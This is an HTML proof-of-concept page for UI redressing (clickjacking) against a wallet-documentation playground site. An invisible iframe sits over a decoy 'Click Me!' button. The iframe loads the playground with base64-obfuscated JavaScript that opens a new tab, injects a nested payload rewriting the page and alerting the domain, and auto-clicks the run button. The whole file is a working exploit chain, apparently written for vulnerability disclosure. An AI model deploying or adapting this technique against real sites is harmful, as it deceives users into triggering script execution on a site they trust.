<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>UI Redressing PoC</title>
    <style>
        body {
            text-align: center;
            font-family: Arial, sans-serif;
        }

        .container {
          text-align:left;
            position: relative;
            
        }

        .fake-button {
          top:75px;
          left:15px;
            font-size: 20px;
            background-color: red;
            color: white;
            border: none;
            cursor: pointer;
            position: absolute;
            z-index: 2;
            opacity: 1;
        }

        .hidden-frame {
            position: absolute;
            top: 0;
            left: 0;
            width: 150px;
            height: 120px;
            opacity: 0;
            z-index: 10;
            pointer-events: auto;
        }


    </style>
</head>
<body>

    <div class="container">
        <button class="fake-button">Click Me!</button>
        <iframe class="hidden-frame" src="https://docs.walletbeacon.io/playground?code=Y29uc3QgbmV3VGFiID0gd2luZG93Lm9wZW4oImh0dHBzOi8vZG9jcy53YWxsZXRiZWFjb24uaW8vcGxheWdyb3VuZD9jb2RlPVpHOWpkVzFsYm5RdVltOWtlUzVwYm01bGNraFVUVXc5SWp4alpXNTBaWEklMmJWR1Y2YjNNZ2RHOGdkR2hsSUcxdmIyNGdhWE1nY0hKdlozSmhiVzFsWkNFOEwyTmxiblJsY2o0aU8yRnNaWEowS0dSdlkzVnRaVzUwTG1SdmJXRnBiaWs3IiwgIl9ibGFuayIpOwoKbmV3VGFiLm9ubG9hZCA9IGZ1bmN0aW9uICgpIHsKICAgIHNldFRpbWVvdXQoKCkgPT4gewogICAgICAgIGNvbnN0IGJ1dHRvbiA9IG5ld1RhYi5kb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIucnVuYm94X19ib1IgYnV0dG9uIik7CiAgICAgICAgaWYgKGJ1dHRvbikgewogICAgICAgICAgICBidXR0b24uY2xpY2soKTsKICAgICAgICB9IGVsc2UgewogICAgICAgICAgICBjb25zb2xlLmVycm9yKCJCdXR0b24gbm90IGZvdW5kISIpOwogICAgICAgIH0KICAgIH0sIDUwMDApOwp9Ow=="" frameborder="0" scrolling="no"></iframe>
    </div>

</body>
</html>
